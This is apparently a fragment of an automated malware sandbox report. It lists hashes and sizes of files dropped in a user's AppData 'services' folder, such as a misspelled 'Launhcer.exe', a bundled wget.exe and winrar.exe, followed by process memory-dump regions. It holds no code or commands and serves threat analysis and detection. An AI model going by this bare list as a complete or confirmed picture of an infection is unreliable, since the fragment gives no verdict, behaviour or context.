                                                              Filesize

                                                              399KB

                                                              MD5

                                                              5886235e78709ba971a3b4cdfdc336ee

                                                              SHA1

                                                              856e9688e3e087489d6d4ef02b7317d3cbc1fff7

                                                              SHA256

                                                              059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970

                                                              SHA512

                                                              0699b612c13187f89e71b0008221dddab30c3adaef353c21b40fda72f2487eea874f2475f6e9a9a5a23855f20548dae537fa97fcbeabfc1f266f5219dacdb244

                                                            • C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              6cced0a38b185030835bf8857633c159

                                                              SHA1

                                                              4f1604d5e67894fb6b054f8ac82122fa8ad69ed6

                                                              SHA256

                                                              f15ae3d7b9d5310f53939148cf8fe58c8078086e934628ad2c3a611a59181e36

                                                              SHA512

                                                              576c4e937b13050ca408445242db266e43c02dc1ec8ea567994594bd624c276bb20c46b94cf54cfe1ac36091bb4cf9959df1403b4838ab15fa10c75f119e18cc

                                                            • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

                                                              Filesize

                                                              364KB

                                                              MD5

                                                              e5c00b0bc45281666afd14eef04252b2

                                                              SHA1

                                                              3b6eecf8250e88169976a5f866d15c60ee66b758

                                                              SHA256

                                                              542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

                                                              SHA512

                                                              2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

                                                            • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              f0fc065f7fd974b42093594a58a4baef

                                                              SHA1

                                                              dbf28dd15d4aa338014c9e508a880e893c548d00

                                                              SHA256

                                                              d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

                                                              SHA512

                                                              8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

                                                            • C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              6e7b8b4200d14198c2a6c2c7617a78db

                                                              SHA1

                                                              b4d87db35a6cb1630a78e50939317f7c68a5303d

                                                              SHA256

                                                              91436d2eb99775eef9b6e543c089794f851d750924d3aaede3627623fd0a7f2e

                                                              SHA512

                                                              72aaa8307509aa26782e3954511f0d6306c9cffce312566b91036f173cd763f2d621f907cc3646cb0c0881ef066b7ec10d784eeb4c47c732812bb3eb3ddeb99d

                                                            • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

                                                              Filesize

                                                              364KB

                                                              MD5

                                                              93fde4e38a84c83af842f73b176ab8dc

                                                              SHA1

                                                              e8c55cc160a0a94e404f544b22e38511b9d71da8

                                                              SHA256

                                                              fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

                                                              SHA512

                                                              48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

                                                            • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              1b6de83d3f1ccabf195a98a2972c366a

                                                              SHA1

                                                              09f03658306c4078b75fa648d763df9cddd62f23

                                                              SHA256

                                                              e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

                                                              SHA512

                                                              e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

                                                            • C:\Users\Admin\AppData\Roaming\services\wget.exe

                                                              Filesize

                                                              4.9MB

                                                              MD5

                                                              8c04808e4ba12cb793cf661fbbf6c2a0

                                                              SHA1

                                                              bdfdb50c5f251628c332042f85e8dd8cf5f650e3

                                                              SHA256

                                                              a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

                                                              SHA512

                                                              9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

                                                            • C:\Users\Admin\AppData\Roaming\services\winrar.exe

                                                              Filesize

                                                              2.1MB

                                                              MD5

                                                              f59f4f7bea12dd7c8d44f0a717c21c8e

                                                              SHA1

                                                              17629ccb3bd555b72a4432876145707613100b3e

                                                              SHA256

                                                              f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

                                                              SHA512

                                                              44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

                                                            • memory/1080-208-0x00000244EC870000-0x00000244EC88A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/1080-206-0x00000244EC610000-0x00000244EC6C5000-memory.dmp

                                                              Filesize

                                                              724KB

                                                            • memory/1080-209-0x00000244EC850000-0x00000244EC856000-memory.dmp

                                                              Filesize

                                                              24KB

                                                            • memory/1080-205-0x00000244EC5F0000-0x00000244EC60C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/1080-207-0x00000244EC5E0000-0x00000244EC5EA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/1484-99-0x00000000031C0000-0x00000000035C0000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/1484-100-0x00000000031C0000-0x00000000035C0000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/1484-104-0x00007FFDDD390000-0x00007FFDDD585000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/1484-106-0x0000000075D50000-0x0000000075F65000-memory.dmp

                                                              Filesize

                                                              2.1MB

                                                            • memory/1484-116-0x0000000000400000-0x000000000047E000-memory.dmp

                                                              Filesize

                                                              504KB

                                                            • memory/1748-103-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                              Filesize

                                                              4.9MB

                                                            • memory/1880-42-0x00000000075D0000-0x0000000007666000-memory.dmp

                                                              Filesize

                                                              600KB

                                                            • memory/1880-94-0x0000000073010000-0x00000000737C0000-memory.dmp

                                                              Filesize

                                                              7.7MB

                                                            • memory/1880-22-0x000000007301E000-0x000000007301F000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1880-43-0x0000000006B00000-0x0000000006B1A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/1880-26-0x0000000073010000-0x00000000737C0000-memory.dmp

                                                              Filesize

                                                              7.7MB

                                                            • memory/1880-41-0x0000000006610000-0x000000000665C000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/1880-45-0x0000000007E50000-0x00000000083F4000-memory.dmp

                                                              Filesize

                                                              5.6MB

                                                            • memory/1880-44-0x0000000006B50000-0x0000000006B72000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/1880-93-0x000000007301E000-0x000000007301F000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/1880-24-0x0000000005880000-0x0000000005EA8000-memory.dmp

                                                              Filesize

                                                              6.2MB

                                                            • memory/1880-25-0x0000000073010000-0x00000000737C0000-memory.dmp

                                                              Filesize

                                                              7.7MB

                                                            • memory/1880-40-0x00000000065F0000-0x000000000660E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/1880-23-0x0000000002CC0000-0x0000000002CF6000-memory.dmp

                                                              Filesize

                                                              216KB

                                                            • memory/1880-30-0x0000000006010000-0x0000000006364000-memory.dmp

                                                              Filesize

                                                              3.3MB

                                                            • memory/1880-29-0x0000000005FA0000-0x0000000006006000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/1880-28-0x0000000005F30000-0x0000000005F96000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/1880-119-0x0000000073010000-0x00000000737C0000-memory.dmp

                                                              Filesize

                                                              7.7MB

                                                            • memory/1880-27-0x0000000005840000-0x0000000005862000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/2028-150-0x0000000000400000-0x000000000046F000-memory.dmp

                                                              Filesize

                                                              444KB

                                                            • memory/2500-70-0x0000000007AB0000-0x0000000007ACE000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/2500-76-0x0000000007E90000-0x0000000007EA4000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/2500-59-0x0000000007AD0000-0x0000000007B02000-memory.dmp

                                                              Filesize

                                                              200KB

                                                            • memory/2500-60-0x000000006F950000-0x000000006F99C000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/2500-71-0x0000000007B10000-0x0000000007BB3000-memory.dmp

                                                              Filesize

                                                              652KB

                                                            • memory/2500-72-0x00000000082A0000-0x000000000891A000-memory.dmp

                                                              Filesize

                                                              6.5MB

                                                            • memory/2500-73-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/2500-74-0x0000000007E50000-0x0000000007E61000-memory.dmp

                                                              Filesize

                                                              68KB

                                                            • memory/2500-75-0x0000000007E80000-0x0000000007E8E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/2500-78-0x0000000007EC0000-0x0000000007EC8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/2500-77-0x0000000007ED0000-0x0000000007EEA000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/2644-85-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                              Filesize

                                                              4.9MB

                                                            • memory/2924-152-0x0000000000400000-0x000000000046F000-memory.dmp

                                                              Filesize

                                                              444KB

                                                            • memory/3096-160-0x000002697FDF0000-0x000002697FE12000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/3096-174-0x00000269677C0000-0x00000269677DC000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/3096-175-0x00000269677B0000-0x00000269677BA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/3096-176-0x00000269003F0000-0x00000269003F8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/3096-177-0x000002697FDC0000-0x000002697FDCA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/3340-186-0x0000000140000000-0x0000000140E3D000-memory.dmp

                                                              Filesize

                                                              14.2MB

                                                            • memory/3964-214-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/3964-212-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/3964-216-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/3964-215-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/3964-219-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/3964-213-0x0000000140000000-0x000000014000E000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/4452-126-0x0000000140000000-0x0000000140E3D000-memory.dmp

                                                              Filesize

                                                              14.2MB

                                                            • memory/4452-124-0x00007FFDDD590000-0x00007FFDDD592000-memory.dmp

                                                              Filesize

                                                              8KB

                                                            • memory/4452-125-0x00007FFDDD5A0000-0x00007FFDDD5A2000-memory.dmp

                                                              Filesize

                                                              8KB

                                                            • memory/4696-225-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-221-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-226-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-240-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-231-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-232-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-230-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-229-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-228-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-224-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-222-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-227-0x0000026786FF0000-0x0000026787010000-memory.dmp

                                                              Filesize

                                                              128KB

                                                            • memory/4696-223-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-220-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4696-239-0x0000000140000000-0x0000000140848000-memory.dmp

                                                              Filesize

                                                              8.3MB

                                                            • memory/4784-237-0x0000000000400000-0x000000000046F000-memory.dmp

                                                              Filesize

                                                              444KB

                                                            • memory/4852-130-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                              Filesize

                                                              4.9MB

                                                            • memory/4896-109-0x00000000026D0000-0x0000000002AD0000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/4896-107-0x0000000000A60000-0x0000000000A69000-memory.dmp

                                                              Filesize

                                                              36KB

                                                            • memory/4896-110-0x00007FFDDD390000-0x00007FFDDD585000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4896-112-0x0000000075D50000-0x0000000075F65000-memory.dmp

                                                              Filesize

                                                              2.1MB

                                                            • memory/5056-247-0x0000000000400000-0x000000000046F000-memory.dmp

                                                              Filesize

                                                              444KB